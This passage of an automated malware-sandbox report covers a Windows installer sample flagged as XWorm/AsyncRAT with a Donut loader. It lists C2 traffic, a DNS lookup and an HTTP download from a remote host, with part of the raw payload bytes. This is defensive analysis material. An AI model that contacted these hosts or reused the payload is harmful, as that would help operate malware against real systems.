Jul 2, 2024 19:26:15.907475948 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:15.909339905 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:15.914211988 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:17.535559893 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:17.542098999 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:17.870080948 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:17.872157097 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:17.877017021 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:18.521421909 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:18.566567898 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:30.613755941 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:30.732541084 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:30.973040104 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:30.978003025 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.035751104 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:31.040673018 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.058919907 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.065179110 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:31.113900900 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.113980055 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:31.118959904 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.306619883 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.308701992 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:31.313999891 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.546469927 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.549139977 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:31.554117918 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.786165953 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:31.788052082 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:31.794362068 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:32.082675934 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:32.087476015 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:32.604402065 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:32.606688023 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:32.611469984 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:34.519814014 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:26:34.524849892 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:26:37.332468033 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:37.544912100 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:37.875310898 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:37.877321959 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:37.882138968 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:44.535512924 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:44.541017056 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:44.869843960 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:44.871345043 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:44.876185894 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:46.380490065 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:46.385560989 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:46.442600965 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:46.448615074 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:46.756450891 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:46.759774923 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:46.767992020 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:46.996155977 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:46.998090029 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:47.004132032 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:48.517290115 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:48.566519976 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:49.473284960 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:49.478162050 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:49.807771921 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:49.813163996 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:49.818033934 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:52.848174095 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:52.853199005 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:52.879391909 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:52.886152029 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:52.895032883 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:52.900600910 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:52.910583019 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:52.915396929 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.182055950 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.183598995 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:53.188522100 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.435084105 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.439193964 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:53.443977118 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.674089909 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.676343918 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:53.681237936 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:53.681313038 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:53.686358929 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:58.020001888 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:58.025515079 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:58.362422943 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:58.364145041 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:58.369164944 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:01.426286936 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:01.431514025 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:01.760094881 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:01.763123035 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:01.767916918 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:08.363729954 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:08.368566990 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:08.697655916 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:08.700891018 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:08.705897093 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:18.518781900 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:18.566585064 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:18.785665989 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:18.790512085 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:18.801675081 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:18.806636095 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:18.848650932 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:18.853559017 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:18.957613945 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:18.962405920 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.004580021 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.009474039 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.123985052 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.126043081 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.131294966 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.301260948 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.306590080 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.359496117 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.361474037 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.366375923 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.426228046 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.431370974 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.598973036 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.600544930 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.605341911 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.605403900 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.610166073 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.839663982 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:19.844947100 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:19.850025892 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.092832088 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.094815969 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:21.095561028 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.095606089 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:21.097083092 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.097124100 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:21.098078966 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.098118067 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:21.100728989 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.317029953 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:21.322261095 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.720752954 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:21.722687960 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:21.727508068 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:24.863821983 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:24.868638992 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:24.879378080 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:24.884130955 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:24.942049980 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:24.946814060 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:24.957470894 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:24.962264061 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.082573891 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.087451935 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.098114014 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.102936983 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.113816977 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.118577003 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.160862923 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.165678024 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.176203966 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.181107998 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.196995974 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.198518038 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.245872021 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.437726021 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.440114975 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.444932938 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.676493883 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.678153992 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.683053970 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.683165073 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.687952995 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.915642023 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.923172951 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.928015947 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:25.935149908 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:25.940073967 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:27.989346027 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:27.994312048 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:28.322792053 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:28.325889111 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:28.330797911 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:33.363954067 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:33.369385004 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:33.697273970 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:33.698760986 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:33.703732967 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:35.692116976 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:35.696856976 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:36.025947094 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:36.031167984 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:36.035933018 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:38.457875967 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:38.462836981 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:38.791779041 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:38.796690941 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:38.801616907 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:39.145569086 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:39.151108027 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:39.481745005 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:39.483690977 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:39.488785982 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:48.531831026 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:48.585284948 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:48.791187048 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:48.796246052 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:49.127213955 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:49.129750967 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:49.134670973 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.176978111 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:51.182013988 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.270747900 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:51.275788069 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.285759926 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:51.290716887 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.532635927 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.534809113 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:51.540844917 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.754383087 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.756232977 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:51.761298895 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.991328955 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:51.993124962 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:51.997895956 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:56.427206039 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:56.432564974 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:56.761580944 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:56.763216019 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:56.768172979 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:58.738987923 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:58.744807959 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:59.199240923 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:27:59.201260090 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:27:59.206070900 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:28:02.301711082 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:28:02.306746006 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:28:02.635546923 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:28:02.641410112 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:28:02.647008896 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:28:13.915904045 CEST	49708	7000	192.168.2.10	59.56.110.103

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:24:44.551358938 CEST	62058	53	192.168.2.10	1.1.1.1
Jul 2, 2024 19:24:45.021696091 CEST	53	62058	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:24:44.551358938 CEST	192.168.2.10	1.1.1.1	0x24a3	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:24:45.021696091 CEST	1.1.1.1	192.168.2.10	0x24a3	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	91.208.240.157	881	7572	C:\Users\user\Desktop\103__Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:24:45.032059908 CEST	94	OUT	GET /103.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:24:45.979119062 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:24:29 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Thu, 13 Jun 2024 01:27:05 GMT Connection: keep-alive ETag: "666a4ae9-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 fb 5d ff e0 ef bf b0 5f 31 b0 bd 8e 81 b3 52 e4 ec 19 18 69 e6 c6 e6 a5 b3 08 46 07 63 45 5b 43 00 00 00 00 59 79 03 8d 8b d8 c6 a7 da 49 b9 0e e8 ce 1a 60 47 d1 60 39 01 b8 41 a0 c0 c2 9d f2 92 9b 3c 89 1f b7 87 78 70 51 26 50 26 83 e6 17 35 09 23 81 06 b9 48 cd 72 66 0d 87 b6 77 0b 0f c2 35 2d 7a 93 7b 5c b8 88 68 74 84 a8 6f 3e 2f 02 82 5e 05 8e 18 33 c3 21 b5 0d 05 21 4d e1 fc d9 d8 fd 89 73 41 1c 94 91 41 ca 77 f0 2d 2b e3 b8 92 0f b3 50 b3 75 35 db 9c e5 c4 a6 ab 7e 6b bb 49 eb 77 17 bb b6 25 e5 f6 41 09 9c 00 0d 50 e8 31 50 38 7e a6 e4 63 e3 1e a1 e1 e7 9f 2a 34 ef 53 d3 36 74 85 bf 46 6c 73 bc 95 6a 26 54 a6 3b 76 73 8c 44 e9 ce 2e 87 19 62 a0 86 44 e3 ee 0d 30 79 1f 37 29 a3 4a f8 46 97 37 33 82 b3 ba 7e b8 60 8c d2 8f 4c d3 6a d9 3d e9 2c 45 01 a1 9a 4b 74 66 f6 bc ef e6 7c 41 4e 94 1f 04 a7 0f ef fb 89 e3 d8 d8 d2 9f a1 6a 54 73 48 27 b4 89 0d 91 3b d9 b6 a0 9e 5c 36 98 41 d7 65 ac 16 0d a3 24 3d 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: ]_1RiFcE[CYyI`G`9A<xpQ&P&5#Hrfw5-z{\hto>/^3!!MsAAw-+Pu5~kIw%AP1P8~c4S6tFlsj&T;vsD.bD0y7)JF73~`Lj=,EKtf\|ANjTsH';\6Ae$=($=V3O ,bfBC=]\HC{}Z(Y'+2jwOa&^^{Rj\|"/}"=jVP)C8h`mlTK#vZl:]}j]]}FuSOSu1R @Rq)6HHX}TOkB$MGqHI(1SG`!t<[AzA?5ufcj6<;;Q^l3.5Nh;XeA~WJnE JU[ldIb[=0f>_mc

Target ID:	0
Start time:	13:24:42
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\103__Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\103__Installer.exe"
Imagebase:	0xb70000
File size:	249'344 bytes
MD5 hash:	FBA295E75A2C2FD0F205DA0A14B76859
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:28:05
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	11.2%
Signature Coverage:	2%
Total number of Nodes:	796
Total number of Limit Nodes:	79

Executed Functions

Function 00B725AD Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B725AD

Part of subcall function 00B72202: __EH_prolog.LIBCMT ref: 00B72207

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
Instruction ID: 5211b258b6681e7f6dc7225829a0ebdddf62cf7f78b91664ca97f91e9c06ff5e
Opcode Fuzzy Hash: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
Instruction Fuzzy Hash: 06113AB5900218EFCF14DF98C981AAEBBB4FF18314F20819AE56667261C7719F00DBA0

Function 05F84D08 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V^m, xrefs: 05F84FBF

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID: \V^m
API String ID: 0-3751104571
Opcode ID: 65ab9b027fdb9a34b59e9903ea87150e9299ad61e1dabde5b4cf2aad9d2406f1
Instruction ID: a36d6b14b0a6c8cd24317fa3298456f605ab09ac64ad83fe521d4b01d2787bba
Opcode Fuzzy Hash: 65ab9b027fdb9a34b59e9903ea87150e9299ad61e1dabde5b4cf2aad9d2406f1
Instruction Fuzzy Hash: B2B16071E0021A9FDF10DFA9D885BEDBBF2BF88318F148129D815A7254EB789845CF81

Function 05F8ED84 Relevance: .9, Instructions: 936COMMON

Download Yara Rule

Memory Dump Source

